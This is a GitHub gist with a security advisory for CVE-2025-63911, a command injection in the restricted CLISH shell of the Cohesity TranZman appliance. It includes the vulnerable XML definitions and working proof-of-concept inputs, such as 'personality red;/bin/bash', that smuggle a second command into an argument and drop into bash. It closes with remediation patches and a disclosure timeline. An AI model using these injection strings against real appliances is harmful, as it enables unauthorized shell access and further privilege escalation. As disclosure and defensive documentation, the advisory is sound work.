Skip to content

Instantly share code, notes, and snippets.

@GregDurys

GregDurys/CVE-2025-63911.md

Created March 2, 2026 17:29
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save GregDurys/8b7a3022c04b6cee8c1e1af04f5671b2 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save GregDurys/8b7a3022c04b6cee8c1e1af04f5671b2 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2025-63911 - Cohesity TranZman CLISH Command Injection
Raw
CVE-2025-63911.md

CVE-2025-63911: CLISH Command Injection in Cohesity TranZman

Overview

Field Value
CVE ID CVE-2025-63911
CVSS v3.1 7.2 (High)
Vector AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE CWE-78: OS Command Injection
Vendor Cohesity, Inc.
Product TranZman Migration Appliance
Affected Versions Release 4.0 Build 14614 including patch TZM_1757588060_SEP2025_FULL.depot

Description

Multiple command injection vulnerabilities exist in the CLISH restricted shell of the TranZman appliance. These allow the authenticated admin user to escape the restricted environment and gain unrestricted shell access. The shell escapes require privileged commands to be enabled (through the enable command), resulting in a CVSS 3.1 score of 7.2.

Exploitation

Instance 1: Personality Command Injection

The personality command in config-view.xml specifies a parameter of type STRING which is passed to a shell script:

<!-- /etc/clish/config-view.xml -->
<ACTION>
  sudo /opt/SRLtzm/bin/change_appliance_personality ${personality}
</ACTION>

The STRING type as defined in types.xml performs insufficient sanitisation:

<!-- /etc/clish/types.xml -->
<PTYPE name="STRING"
       pattern="[^\-]+"
       help="String"/>

The regex [^\-]+ accepts any character except hyphens, including shell metacharacters such as semicolons, pipes, and dollar signs.

The below demonstrates a functional proof-of-concept that escapes to bash:

$ ssh admin@<IP_ADDRESS>
admin@<IP_ADDRESS>'s password:
**********************************************
*                                            *
*    Tranzman release 4.0 (BUILD 14614)      *
*                                            *
**********************************************
Welcome admin it is Fri 12 Sep 17:26:28 BST 2025
> config
> personality red;id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
> personality red;/bin/bash
[admin@tzm ~]$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Instance 2: Load Media Command Injection

The load_media command in devices-view suffers from the same vulnerability:

<ACTION>
  sudo /opt/SRLtzm/bin/load_media -media ${mediaid} -read -cep 7F000001
</ACTION>

When the user inputs ;/bin/bash;, the resulting command becomes:

sudo /opt/SRLtzm/bin/load_media -media ;/bin/bash; -read -cep 7F000001

Proof-of-concept:

> load_media ;/bin/bash;
Usage: /opt/SRLtzm/scripts/perl/load_media.pl -read | -write | -share -media
MEDIA_ID -cep 0A0A0A0A [ -j jobid ]
[admin@tzm ~]$

Impact

An attacker who has the admin password (either through their regular job function or by guessing the password) could leverage this vulnerability to escape the restricted shell. While the escaped shell runs as admin (uid=1000), the user operates in an unconfined SELinux context and can leverage CVE-2025-63909 (TapeDumper) for privilege escalation to root.

Remediation

Apply Cohesity patches in the following order:

  1. TZM_patch_1.patch
  2. TZM_1760106063_OCT2025R2_FULL.depot

Contact Cohesity support for the latest OVA version with integrated fixes.

Timeline

Date Event
26 September 2025 Reported to Cohesity
20 October 2025 Cohesity confirmed fix in patches
25 December 2025 Embargo period ended
27 December 2025 Public disclosure

Credit

Discovered by Greg Durys, LME

References

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment